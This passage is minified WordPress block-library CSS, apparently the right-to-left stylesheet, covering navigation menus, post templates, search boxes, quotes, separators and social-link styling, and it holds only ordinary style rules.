(max-width:600px){ .wp-block-media-text.is-stacked-on-mobile{ grid-template-columns:100% !important; } .wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__media{ grid-column:1; grid-row:1; } .wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__content{ grid-column:1; grid-row:2; } } .wp-block-navigation{ position:relative; } .wp-block-navigation ul{ margin-bottom:0; margin-right:0; margin-top:0; padding-right:0; } .wp-block-navigation ul,.wp-block-navigation ul li{ list-style:none; padding:0; } .wp-block-navigation .wp-block-navigation-item{ align-items:center; display:flex; position:relative; } .wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{ display:none; } .wp-block-navigation .wp-block-navigation-item__content{ display:block; z-index:1; } .wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{ color:inherit; } .wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{ text-decoration:underline; } .wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{ text-decoration:line-through; } .wp-block-navigation :where(a),.wp-block-navigation :where(a:active),.wp-block-navigation :where(a:focus){ text-decoration:none; } .wp-block-navigation .wp-block-navigation__submenu-icon{ align-self:center; background-color:inherit; border:none; color:currentColor; display:inline-block; font-size:inherit; height:.6em; line-height:0; margin-right:.25em; padding:0; width:.6em; } .wp-block-navigation .wp-block-navigation__submenu-icon svg{ display:inline-block; stroke:currentColor; height:inherit; margin-top:.075em; width:inherit; } .wp-block-navigation{ --navigation-layout-justification-setting:flex-start; --navigation-layout-direction:row; --navigation-layout-wrap:wrap; --navigation-layout-justify:flex-start; --navigation-layout-align:center; } .wp-block-navigation.is-vertical{ --navigation-layout-direction:column; --navigation-layout-justify:initial; --navigation-layout-align:flex-start; } .wp-block-navigation.no-wrap{ --navigation-layout-wrap:nowrap; } .wp-block-navigation.items-justified-center{ --navigation-layout-justification-setting:center; --navigation-layout-justify:center; } .wp-block-navigation.items-justified-center.is-vertical{ --navigation-layout-align:center; } .wp-block-navigation.items-justified-right{ --navigation-layout-justification-setting:flex-end; --navigation-layout-justify:flex-end; } .wp-block-navigation.items-justified-right.is-vertical{ --navigation-layout-align:flex-end; } .wp-block-navigation.items-justified-space-between{ --navigation-layout-justification-setting:space-between; --navigation-layout-justify:space-between; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ align-items:normal; background-color:inherit; color:inherit; display:flex; flex-direction:column; opacity:0; position:absolute; z-index:2; } @media not (prefers-reduced-motion){ .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ transition:opacity .1s linear; } } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ height:0; overflow:hidden; visibility:hidden; width:0; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{ display:flex; flex-grow:1; padding:.5em 1em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{ margin-left:0; margin-right:auto; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{ margin:0; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ right:-1px; top:100%; } @media (min-width:782px){ .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ right:100%; top:-1px; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{ background:#0000; content:""; display:block; height:100%; left:100%; position:absolute; width:.5em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{ margin-left:.25em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{ transform:rotate(90deg); } } .wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; overflow:visible; visibility:visible; width:auto; } .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{ right:0; top:100%; } @media (min-width:782px){ .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ right:100%; top:0; } } .wp-block-navigation-submenu{ display:flex; position:relative; } .wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{ stroke:currentColor; } button.wp-block-navigation-item__content{ background-color:initial; border:none; color:currentColor; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; text-align:right; text-transform:inherit; } .wp-block-navigation-submenu__toggle{ cursor:pointer; } .wp-block-navigation-submenu__toggle[aria-expanded=true]+.wp-block-navigation__submenu-icon>svg,.wp-block-navigation-submenu__toggle[aria-expanded=true]>svg{ transform:rotate(-180deg); } .wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{ padding-left:.85em; padding-right:0; } .wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{ margin-right:-.6em; pointer-events:none; } .wp-block-navigation-item.open-on-click button.wp-block-navigation-item__content:not(.wp-block-navigation-submenu__toggle){ padding:0; } .wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{ gap:inherit; } :where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){ padding:.5em 1em; } :where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){ padding:.5em 1em; } .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{ left:0; right:auto; } .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:-1px; right:-1px; } @media (min-width:782px){ .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:100%; right:auto; } } .wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{ background-color:#fff; border:1px solid #00000026; } .wp-block-navigation.has-background .wp-block-navigation__submenu-container{ background-color:inherit; } .wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{ color:#000; } .wp-block-navigation__container{ align-items:var(--navigation-layout-align, initial); display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); list-style:none; margin:0; padding-right:0; } .wp-block-navigation__container .is-responsive{ display:none; } .wp-block-navigation__container:only-child,.wp-block-page-list:only-child{ flex-grow:1; } @keyframes overlay-menu__fade-in-animation{ 0%{ opacity:0; transform:translateY(.5em); } to{ opacity:1; transform:translateY(0); } } .wp-block-navigation__responsive-container{ bottom:0; display:none; left:0; position:fixed; right:0; top:0; } .wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){ color:inherit; } .wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{ align-items:var(--navigation-layout-align, initial); display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); } .wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){ background-color:inherit !important; color:inherit !important; } .wp-block-navigation__responsive-container.is-menu-open{ background-color:inherit; display:flex; flex-direction:column; } @media not (prefers-reduced-motion){ .wp-block-navigation__responsive-container.is-menu-open{ animation:overlay-menu__fade-in-animation .1s ease-out; animation-fill-mode:forwards; } } .wp-block-navigation__responsive-container.is-menu-open{ overflow:auto; padding:clamp(1rem, var(--wp--style--root--padding-top), 20rem) clamp(1rem, var(--wp--style--root--padding-left), 20rem) clamp(1rem, var(--wp--style--root--padding-bottom), 20rem) clamp(1rem, var(--wp--style--root--padding-right), 20rem); z-index:100000; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{ align-items:var(--navigation-layout-justification-setting, inherit); display:flex; flex-direction:column; flex-wrap:nowrap; overflow:visible; padding-top:calc(2rem + 24px); } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{ justify-content:flex-start; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{ display:none; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{ border:none; height:auto; min-width:200px; opacity:1; overflow:initial; padding-left:2rem; padding-right:2rem; position:static; visibility:visible; width:auto; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{ gap:inherit; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{ padding-top:var(--wp--style--block-gap, 2em); } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{ padding:0; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{ align-items:var(--navigation-layout-justification-setting, initial); display:flex; flex-direction:column; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{ background:#0000 !important; color:inherit !important; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{ left:auto; right:auto; } @media (min-width:600px){ .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){ background-color:inherit; display:block; position:relative; width:100%; z-index:auto; } .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{ display:none; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{ right:0; } } .wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{ background-color:#fff; } .wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{ color:#000; } .wp-block-navigation__toggle_button_label{ font-size:1rem; font-weight:700; } .wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{ background:#0000; border:none; color:currentColor; cursor:pointer; margin:0; padding:0; text-transform:inherit; vertical-align:middle; } .wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{ fill:currentColor; display:block; height:24px; pointer-events:none; width:24px; } .wp-block-navigation__responsive-container-open{ display:flex; } .wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{ font-family:inherit; font-size:inherit; font-weight:inherit; } @media (min-width:600px){ .wp-block-navigation__responsive-container-open:not(.always-shown){ display:none; } } .wp-block-navigation__responsive-container-close{ left:0; position:absolute; top:0; z-index:2; } .wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{ font-family:inherit; font-size:inherit; font-weight:inherit; } .wp-block-navigation__responsive-close{ width:100%; } .has-modal-open .wp-block-navigation__responsive-close{ margin-left:auto; margin-right:auto; max-width:var(--wp--style--global--wide-size, 100%); } .wp-block-navigation__responsive-close:focus{ outline:none; } .is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{ box-sizing:border-box; } .wp-block-navigation__responsive-dialog{ position:relative; } .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{ margin-top:46px; } @media (min-width:782px){ .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{ margin-top:32px; } } html.has-modal-open{ overflow:hidden; } .wp-block-navigation .wp-block-navigation-item__label{ overflow-wrap:break-word; } .wp-block-navigation .wp-block-navigation-item__description{ display:none; } .link-ui-tools{ outline:1px solid #f0f0f0; padding:8px; } .link-ui-block-inserter{ padding-top:8px; } .link-ui-block-inserter__back{ margin-right:8px; text-transform:uppercase; } .wp-block-navigation .wp-block-page-list{ align-items:var(--navigation-layout-align, initial); background-color:inherit; display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); } .wp-block-navigation .wp-block-navigation-item{ background-color:inherit; } .wp-block-page-list{ box-sizing:border-box; } .is-small-text{ font-size:.875em; } .is-regular-text{ font-size:1em; } .is-large-text{ font-size:2.25em; } .is-larger-text{ font-size:3em; } .has-drop-cap:not(:focus):first-letter{ float:right; font-size:8.4em; font-style:normal; font-weight:100; line-height:.68; margin:.05em 0 0 .1em; text-transform:uppercase; } body.rtl .has-drop-cap:not(:focus):first-letter{ float:none; margin-right:.1em; } p.has-drop-cap.has-background{ overflow:hidden; } :root :where(p.has-background){ padding:1.25em 2.375em; } :where(p.has-text-color:not(.has-link-color)) a{ color:inherit; } p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{ rotate:180deg; } .wp-block-post-author{ box-sizing:border-box; display:flex; flex-wrap:wrap; } .wp-block-post-author__byline{ font-size:.5em; margin-bottom:0; margin-top:0; width:100%; } .wp-block-post-author__avatar{ margin-left:1em; } .wp-block-post-author__bio{ font-size:.7em; margin-bottom:.7em; } .wp-block-post-author__content{ flex-basis:0; flex-grow:1; } .wp-block-post-author__name{ margin:0; } .wp-block-post-author-biography{ box-sizing:border-box; } :where(.wp-block-post-comments-form input:not([type=submit])),:where(.wp-block-post-comments-form textarea){ border:1px solid #949494; font-family:inherit; font-size:1em; } :where(.wp-block-post-comments-form input:where(:not([type=submit]):not([type=checkbox]))),:where(.wp-block-post-comments-form textarea){ padding:calc(.667em + 2px); } .wp-block-post-comments-form{ box-sizing:border-box; } .wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){ font-weight:inherit; } .wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){ font-family:inherit; } .wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){ font-size:inherit; } .wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){ line-height:inherit; } .wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){ font-style:inherit; } .wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){ letter-spacing:inherit; } .wp-block-post-comments-form :where(input[type=submit]){ box-shadow:none; cursor:pointer; display:inline-block; overflow-wrap:break-word; text-align:center; } .wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{ box-sizing:border-box; display:block; width:100%; } .wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{ display:block; margin-bottom:.25em; } .wp-block-post-comments-form .comment-form-cookies-consent{ display:flex; gap:.25em; } .wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{ margin-top:.35em; } .wp-block-post-comments-form .comment-reply-title{ margin-bottom:0; } .wp-block-post-comments-form .comment-reply-title :where(small){ font-size:var(--wp--preset--font-size--medium, smaller); margin-right:.5em; } .wp-block-post-comments-count{ box-sizing:border-box; } .wp-block-post-content{ display:flow-root; } .wp-block-post-comments-link,.wp-block-post-date{ box-sizing:border-box; } :where(.wp-block-post-excerpt){ box-sizing:border-box; margin-bottom:var(--wp--style--block-gap); margin-top:var(--wp--style--block-gap); } .wp-block-post-excerpt__excerpt{ margin-bottom:0; margin-top:0; } .wp-block-post-excerpt__more-text{ margin-bottom:0; margin-top:var(--wp--style--block-gap); } .wp-block-post-excerpt__more-link{ display:inline-block; } .wp-block-post-featured-image{ margin-left:0; margin-right:0; } .wp-block-post-featured-image a{ display:block; height:100%; } .wp-block-post-featured-image :where(img){ box-sizing:border-box; height:auto; max-width:100%; vertical-align:bottom; width:100%; } .wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{ width:100%; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{ background-color:#000; inset:0; position:absolute; } .wp-block-post-featured-image{ position:relative; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{ background-color:initial; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{ opacity:0; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{ opacity:.1; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{ opacity:.2; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{ opacity:.3; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{ opacity:.4; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{ opacity:.5; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{ opacity:.6; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{ opacity:.7; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{ opacity:.8; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{ opacity:.9; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{ opacity:1; } .wp-block-post-featured-image:where(.alignleft,.alignright){ width:100%; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{ display:inline-block; margin-left:1ch; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{ display:inline-block; margin-right:1ch; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{ rotate:180deg; } .wp-block-post-terms{ box-sizing:border-box; } .wp-block-post-terms .wp-block-post-terms__separator{ white-space:pre-wrap; } .wp-block-post-time-to-read,.wp-block-post-title{ box-sizing:border-box; } .wp-block-post-title{ word-break:break-word; } .wp-block-post-title :where(a){ display:inline-block; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; text-decoration:inherit; } .wp-block-post-author-name,.wp-block-preformatted{ box-sizing:border-box; } .wp-block-preformatted{ white-space:pre-wrap; } :where(.wp-block-preformatted.has-background){ padding:1.25em 2.375em; } .wp-block-pullquote{ box-sizing:border-box; margin:0 0 1em; overflow-wrap:break-word; padding:4em 0; text-align:center; } .wp-block-pullquote blockquote,.wp-block-pullquote p{ color:inherit; } .wp-block-pullquote blockquote{ margin:0; } .wp-block-pullquote p{ margin-top:0; } .wp-block-pullquote p:last-child{ margin-bottom:0; } .wp-block-pullquote.alignleft,.wp-block-pullquote.alignright{ max-width:420px; } .wp-block-pullquote cite,.wp-block-pullquote footer{ position:relative; } .wp-block-pullquote .has-text-color a{ color:inherit; } .wp-block-pullquote.has-text-align-left blockquote{ text-align:right; } .wp-block-pullquote.has-text-align-right blockquote{ text-align:left; } .wp-block-pullquote.has-text-align-center blockquote{ text-align:center; } .wp-block-pullquote.is-style-solid-color{ border:none; } .wp-block-pullquote.is-style-solid-color blockquote{ margin-left:auto; margin-right:auto; max-width:60%; } .wp-block-pullquote.is-style-solid-color blockquote p{ font-size:2em; margin-bottom:0; margin-top:0; } .wp-block-pullquote.is-style-solid-color blockquote cite{ font-style:normal; text-transform:none; } .wp-block-pullquote :where(cite){ color:inherit; display:block; } .wp-block-post-template{ box-sizing:border-box; list-style:none; margin-bottom:0; margin-top:0; max-width:100%; padding:0; } .wp-block-post-template.is-flex-container{ display:flex; flex-direction:row; flex-wrap:wrap; gap:1.25em; } .wp-block-post-template.is-flex-container>li{ margin:0; width:100%; } @media (min-width:600px){ .wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{ width:calc(50% - .625em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{ width:calc(33.33333% - .83333em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{ width:calc(25% - .9375em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{ width:calc(20% - 1em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{ width:calc(16.66667% - 1.04167em); } } @media (max-width:600px){ .wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{ grid-template-columns:1fr; } } .wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{ float:left; margin-inline-end:0; margin-inline-start:2em; } .wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{ float:right; margin-inline-end:2em; margin-inline-start:0; } .wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{ margin-inline-end:auto; margin-inline-start:auto; } .wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{ margin-inline-start:auto; } .wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{ margin-inline-end:auto; } .wp-block-query-pagination .wp-block-query-pagination-previous-arrow{ display:inline-block; margin-left:1ch; } .wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-query-pagination .wp-block-query-pagination-next-arrow{ display:inline-block; margin-right:1ch; } .wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-query-pagination.aligncenter{ justify-content:center; } .wp-block-query-title,.wp-block-query-total,.wp-block-quote{ box-sizing:border-box; } .wp-block-quote{ overflow-wrap:break-word; } .wp-block-quote.is-large:where(:not(.is-style-plain)),.wp-block-quote.is-style-large:where(:not(.is-style-plain)){ margin-bottom:1em; padding:0 1em; } .wp-block-quote.is-large:where(:not(.is-style-plain)) p,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) p{ font-size:1.5em; font-style:italic; line-height:1.6; } .wp-block-quote.is-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-large:where(:not(.is-style-plain)) footer,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) footer{ font-size:1.125em; text-align:left; } .wp-block-quote>cite{ display:block; } .wp-block-read-more{ display:block; width:fit-content; } .wp-block-read-more:where(:not([style*=text-decoration])){ text-decoration:none; } .wp-block-read-more:where(:not([style*=text-decoration])):active,.wp-block-read-more:where(:not([style*=text-decoration])):focus{ text-decoration:none; } ul.wp-block-rss.alignleft{ margin-right:2em; } ul.wp-block-rss.alignright{ margin-left:2em; } ul.wp-block-rss.is-grid{ display:flex; flex-wrap:wrap; padding:0; } ul.wp-block-rss.is-grid li{ margin:0 0 1em 1em; width:100%; } @media (min-width:600px){ ul.wp-block-rss.columns-2 li{ width:calc(50% - 1em); } ul.wp-block-rss.columns-3 li{ width:calc(33.33333% - 1em); } ul.wp-block-rss.columns-4 li{ width:calc(25% - 1em); } ul.wp-block-rss.columns-5 li{ width:calc(20% - 1em); } ul.wp-block-rss.columns-6 li{ width:calc(16.66667% - 1em); } } .wp-block-rss__item-author,.wp-block-rss__item-publish-date{ display:block; font-size:.8125em; } .wp-block-rss{ box-sizing:border-box; list-style:none; padding:0; } .wp-block-search__button{ margin-right:10px; word-break:normal; } .wp-block-search__button.has-icon{ line-height:0; } .wp-block-search__button svg{ height:1.25em; min-height:24px; min-width:24px; width:1.25em; fill:currentColor; vertical-align:text-bottom; } :where(.wp-block-search__button){ border:1px solid #ccc; padding:6px 10px; } .wp-block-search__inside-wrapper{ display:flex; flex:auto; flex-wrap:nowrap; max-width:100%; } .wp-block-search__label{ width:100%; } .wp-block-search.wp-block-search__button-only .wp-block-search__button{ box-sizing:border-box; display:flex; flex-shrink:0; justify-content:center; margin-right:0; max-width:100%; } .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{ min-width:0 !important; transition-property:width; } .wp-block-search.wp-block-search__button-only .wp-block-search__input{ flex-basis:100%; transition-duration:.3s; } .wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{ overflow:hidden; } .wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{ border-left-width:0 !important; border-right-width:0 !important; flex-basis:0; flex-grow:0; margin:0; min-width:0 !important; padding-left:0 !important; padding-right:0 !important; width:0 !important; } :where(.wp-block-search__input){ appearance:none; border:1px solid #949494; flex-grow:1; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; margin-left:0; margin-right:0; min-width:3rem; padding:8px; text-decoration:unset !important; text-transform:inherit; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){ background-color:#fff; border:1px solid #949494; box-sizing:border-box; padding:4px; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{ border:none; border-radius:0; padding:0 4px; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{ outline:none; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){ padding:4px 8px; } .wp-block-search.aligncenter .wp-block-search__inside-wrapper{ margin:auto; } .wp-block[data-align=right] .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{ float:left; } .wp-block-separator{ border:none; border-top:2px solid; } :root :where(.wp-block-separator.is-style-dots){ height:auto; line-height:1; text-align:center; } :root :where(.wp-block-separator.is-style-dots):before{ color:currentColor; content:"···"; font-family:serif; font-size:1.5em; letter-spacing:2em; padding-left:2em; } .wp-block-separator.is-style-dots{ background:none !important; border:none !important; } .wp-block-site-logo{ box-sizing:border-box; line-height:0; } .wp-block-site-logo a{ display:inline-block; line-height:0; } .wp-block-site-logo.is-default-size img{ height:auto; width:120px; } .wp-block-site-logo img{ height:auto; max-width:100%; } .wp-block-site-logo a,.wp-block-site-logo img{ border-radius:inherit; } .wp-block-site-logo.aligncenter{ margin-left:auto; margin-right:auto; text-align:center; } :root :where(.wp-block-site-logo.is-style-rounded){ border-radius:9999px; } .wp-block-site-tagline,.wp-block-site-title{ box-sizing:border-box; } .wp-block-site-title :where(a){ color:inherit; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; text-decoration:inherit; } .wp-block-social-links{ background:none; box-sizing:border-box; margin-right:0; padding-left:0; padding-right:0; text-indent:0; } .wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{ border-bottom:0; box-shadow:none; text-decoration:none; } .wp-block-social-links .wp-social-link svg{ height:1em; width:1em; } .wp-block-social-links .wp-social-link span:not(.screen-reader-text){ font-size:.65em; margin-left:.5em; margin-right:.5em; } .wp-block-social-links.has-small-icon-size{ font-size:16px; } 